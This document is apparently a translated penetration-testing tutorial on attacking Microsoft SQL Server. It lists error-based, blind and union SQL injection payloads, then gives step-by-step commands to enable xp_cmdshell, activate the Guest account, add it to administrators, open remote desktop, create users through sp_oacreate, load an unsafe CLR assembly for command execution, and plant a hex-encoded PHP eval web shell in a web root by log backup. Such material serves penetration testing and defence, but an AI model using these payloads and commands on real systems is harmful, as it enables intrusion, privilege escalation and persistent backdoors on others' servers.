Article directory
- 1. MSsql database
- 2. MSsql structure
- 3. MSsql key table
- 4. Common functions of Mssql
- 5. Mssql error injection
- 6. Blind injection of Mssql
- 7. Joint injection
- 8. Injection process
- 9. getshell
1. MSsql database
Strongly typed databases strictly distinguish between numbers and characters.
2. MSsql structure
There are four default databases:
- 1. The master
(重点)
saves the configuration, permissions, database definitions and other required information of the SQL Server instance. - 2. Model
template database. Whenever you create a new database (including TempDB for the system database), a replica database will be created using the Model database and changed to the name you used when you created the database. - 3. msdb
agent database, used to configure alerts using SQL Server agent and scheduled jobs, etc. - 4. Tempdb
temporarily stores data and is used to store data temporarily generated during system operation, such as user-defined tables, indexes, etc.
3. MSsql key table
1. Sysdatabases table in master database
所有的库名
The Sysdatabases table is only saved in the master database. The main fields saved in this table are: name
(database name)
2. Sysobjects table
This system table exists in all databases, whether it is a user-created database or the system default database. This table is stored 当前数据库所有的表名
(similar to the tables table in the information_schema database in MySQL). The main fields are: name (table name), id (table ID), xtype (created object).
When xtype='U'
, the representative is a table created by the user.
- It is different from the database path method of MySQL:
Mysql: information_schema.tables
Mssql: master.dbo
.sysobjects
3. Syscolumns table
This system table exists in all databases, whether it is a user-created database or the system default database.
The table is stored 当前数据库所有的字段名
. The main fields are: name (field name respectively), id (table ID). The ID is the ID number of the table obtained from the sysobjects table.
4. Common functions of Mssql
function | function effect |
---|---|
db name() | Returns the name of the current database |
host_name() | Return computer name |
current_user | Returns the username of the current database |
user | database user |
substring() | String interception function |
@@version | View database version |
char() | ASCII conversion function |
cast(text as type()) | Character type conversion, if the conversion fails, the text result will be reported as an error and displayed on the page. |
object_id() | Return the database table name ID based on the table name |
object_name() | Return database table name based on ID |
col_name(object_id,column_id) 举例:Col_name(object_id(‘users’),2) | Returns the name of the specified field (column) in the specified table |
5. Mssql error injection
Since Mssql is a strongly typed database, an error will be reported once the data types do not match. At this time, we can use it 四则运算
to 整型数据和字符型数据
perform calculations, such as 1+user.
Example POC:'or 1=convert(int,@@version)--
6. Blind injection of Mssql
Similar to mysql, 区别在于使用的函数不同
.
The following functions are commonly used for blind injection:
-
1. patindex(pattern,string)
#Returns the position where a certain character or regular expression appears for the first time in a string. -
2. replace(string,substring1,substring2)
#Replace a substring that appears in the string with another string, that is, replace substring1 that appears in the string with substring2.
Example: replace('1-a 2-b','-', ':'), the return result is: 1:a 2:b -
3. replicate(string,n)
#Copy the string a specified number of times.
Example: replicate('abc',3), the return result is: abcabcabc -
4. stuff(string,pos,delete_length,insertstring)
#First delete a string in the string, and then insert a new substring as a replacement.
Example: stuff('xyz',2,1,'abc'), return The result is: xabcz -
5. upper(string) and lower(string)
#Convert strings to uppercase or lowercase -
6. rtrim(string) and ltrim(string)
#Remove trailing spaces or leading spaces in the string -
7. charindex(expression1, expression2, [start_location])
#Return the starting position of the specified expression in the string. If the position is queried, return the position. If not, return false. In addition, the parameters of charindex are not case-sensitive.
7. Joint injection
1. Get the number of columns of the current table
id=-1 order by 4--+
4 does not report an error, 5 reports an error
2. Get the current database name
id=-1 union all select 1,2,db_name(),4--+
Return here: mozhe_db
3. Get the table name
id=-1 union all select top 1 1,2,name,4 from mozhe_db.dbo.sysobjects where xtype=’U’--+
Return here: manage
If you want to get the next table, you can use the old method. Just add: and name !='manage' after where, and the next table name will pop up.
4. Get table id
id=-1 union all select 1,id,3,4 from sysobjects where name=’manage’--+
Return here: 5575058
5. Get table field names
id=-1 union all select top 1 1,2,name,4 from syscolumns where id=5575058 --+
Return here: username
If you want to get the next field name, you can use the old method. Just add: and name !=' username' after where, and the next field name will pop up.
6. Get the data of the username field in the manage table
id=-1 union all select top 1 1,2, username ,4 from manage --+
Return here: admin_mz
If you want to get the next data, you can use the old method and add directly at the end: where username !='admin_mz', and the next field name will pop up.
8. Injection process
1. Judgment authority
If the page echo is normal, it is correct, otherwise an error is reported. Example POC:
and 1=(select IS_SRVROLEMEMBER('sysadmin')) –
2. Get the current database
and 1=(select db_name()) –
3. Get all data tables in the current database
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –
注意:
The convert function is forced to convert the data type.
The main function of the Quotename function is to add [], '', etc. to column names, table names, etc. in the stored procedure to ensure that the SQL statement can be executed normally.
FOR XML PATH displays the query result set in XML form, displaying multiple rows of results on the same line.
4. Get all fields of the specified data table in the current database
and 1=(select quotename(name) from database name.dbo.syscolumns where id =(select id from database name...sysobjects where name='specified table name') FOR XML PATH('')) –
5. Get the table data content in the specified database
and 1=(select top 1 * from specified database.dbo.specified table name where exclusion condition FOR XML PATH(''))–
9. getshell
1. mssql permissions
- sa permissions: database operations, file management, command execution, registry reading, etc. system. It is the highest authority of mssql
- db permissions: file management, database operations, etc. users-administrators
- Public permissions: database operations guest-users
2. Open xp_cmdshell with SA permission to obtain host permissions
1) Determine whether xp_cmdshell is open
select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'
Return 1 to open; return 0 to close
- If the xp_cmdshell permission is not enabled, we can execute the following command to enable it. The following four steps will enable xp-cmdshell.
execute('sp_configure "show advanced options",1') #将该选项的值设置为1
execute('reconfigure') #保存设置
execute('sp_configure "xp_cmdshell", 1') #将xp_cmdshell的值设置为1
execute('reconfigure') #保存设置
execute('sp_configure') #查看配置
execute('xp_cmdshell "whoami"') #执行系统命令
- or:
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec sp_configure;
exec xp_cmdshell 'whoami';
- After system permissions can be executed, the premise is that the obtained host permissions are in the administrators group.
exec xp_cmdshell 'net user Guest 123456' #给guest用户设置密码
exec xp_cmdshell 'net user Guest /active:yes' #激活guest用户
exec xp_cmdshell 'net localgroup administrators Guest /add' #将guest用户添加到administrators用户组
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' #开启3389端口
-
execute('sp_configure "show advanced options",1') #Set the value of this option to 1
-
execute('reconfigure') #Save settings
-
Although the first step is used to determine whether xp_cmdshell is open and the return value is 1, the command still cannot be executed. Use execute('xp_cmdshell "whoami"') This command is disabled by default
2) Then use the above execute steps to open xp_cmdshell
3. Use sp_oacreate to execute system commands with SA permissions
使用sp_oacreate的前提:sql server数据服务未降权
We can use the com component sp_oacreate in sql server to execute system commands.
1) The following command can check whether sp_oacreate is allowed:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'whoami'
2) Turn on sp_oacreate
EXEC sp_configure 'show advanced options', 1;
//类似于exe('sp_configure' "show advanced options",1)
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
It can be seen from this that the sp_oacreate command has no echo
3) Execute the add user command for testing
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,
'c:\windows\system32\cmd.exe /c net user hack Password@ /add'
--上面sql server语言固定,最后一行是执行的系统命令
4. SA authority uses CLR to execute system commands
There are two ways to create a CLR:
- Create using DLL files
- Create using file hexadecimal stream
Enable CLR functionality
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;
If there is a permission problem, execute the following command
alter database [master] set TRUSTWORTHY on --后续要导入不安全的程序集,因此将数据库标记为安全
EXEC sp_changedbowner 'sa'
导入程序集
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo] FROM 十六进制数据
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER
AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;
执行命令
EXEC [dbo].[SqlStoredProcedure1]; 例如:exec sp_cmdExec 'whoami'
删除程序集
DROP PROCEDURE sp_cmdExec;
DROP ASSEMBLY [WarSQLKit];
5. DB_owner permission LOG backup Getshell
无论是LOG备份还是差异备份,都是利用备份的过程中写入一句话木马
1) Common backup strategies for sql server
- Weekly full backup
- Differential backup once a day
- Hourly transaction backup
2) Prerequisites for use
- The target machine exists
数据库备份文件
. In other words, if we use the test database, the test database is required to have a database backup file, and恢复模式得是完整模式
- Know the absolute path of the website
- Support stack injection
3) Inject code
alter database 数据库名 set RECOVERY FULL; #修改数据库恢复模式为 完整模式
create table cmd (a image); #创建一张表cmd,只有一个列 a,类型为image
backup log 数据库名 to disk= 'C:\phpstudy\WWW\1.php' with init; #备份表到指定路径
insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);
#插入一句话到cmd表里,十六进制为一句话木马<?php @eval($_POST['x']);?>
backup log 数据库名 to disk='C:\phpstudy\WWW\2.php'; #把操作日志备份到指定文件
drop table cmd; #删除cmd表
6. Overview
Use log backup to write a sentence Trojan in the log similar to mysql.
Modify the database recovery model to full mode, then create a table and back up the table to the specified path
Insert a sentence Trojan into the table, back up the log file to a path we know, and finally delete the created table